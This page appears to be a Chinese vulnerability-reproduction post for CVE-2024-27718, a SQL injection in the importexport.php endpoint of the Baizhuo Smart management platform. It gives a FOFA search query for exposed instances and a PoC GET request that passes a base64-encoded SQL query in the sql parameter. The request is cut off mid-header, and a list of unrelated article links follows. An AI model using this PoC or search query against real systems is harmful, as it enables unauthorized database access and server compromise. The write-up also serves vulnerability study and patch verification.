当前位置: 首页 > news >正文

百卓Smart管理平台 importexport.php SQL注入漏洞复现(CVE-2024-27718)

news 2025/9/6 9:05:55

0x01 产品简介

百卓Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。

0x02 漏洞概述

百卓Smart管理平台 importexport.php 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:title="Smart管理平台"

0x04 漏洞复现

PoC

GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,appl
http://www.lryc.cn/news/331084.html

相关文章:

  • PHP教程_PHP5函数str_replace替换字符串中的字符
  • Word的”交叉引用“和”插入题注“快捷键设置
  • 小白从0学习ctf(web安全)
  • 【嵌入式开发 Linux 常用命令系列 7.4 -- awk 处理文件名,去除后缀只保留文件名】
  • Linux重点思考(中)--端口/静态内存/负载/日志
  • 【Go】五、流程控制
  • 数据开发-面试真题。
  • 如何使用免费的ChatGpt3.5
  • Kafka硬核干货
  • 分享几个可以免费使用的GPT网站吧
  • MySQL进阶-----前缀索引、单例与联合索引
  • HTTP——Cookie
  • Scala大数据开发
  • windows无法使用hadoop报错:系统找不到路径
  • 从0配置React
  • File和IO流
  • 2024系统架构师---解释器架构风格的概念与应用
  • makefile01
  • 计算机视觉之三维重建(6)---多视图几何(上)
  • 蓝桥杯:全球变暖(python,BFS,DFS)(栈溢出的处理办法)
  • Qt C++ | Qt 元对象系统、信号和槽及事件(第一集)
  • Python 抽象类
  • 达梦数据库自动备份(全库)+还原(全库) 控制台
  • android AndroidAutoSize 取消第三方库适配问题(两个步骤)
  • 【Java 多线程】从源码出发,剖析Threadlocal的数据结构
  • Sy6 编辑器vi的应用(+shell脚本3例子)
  • 把标注数据导入到知识图谱
  • 【前端基础】什么是类数组对象,类数组对象转换成数组的方法
  • Python快速入门系列-8(Python数据分析与可视化)
  • 双非硕转测试之Java学习笔记(一):集合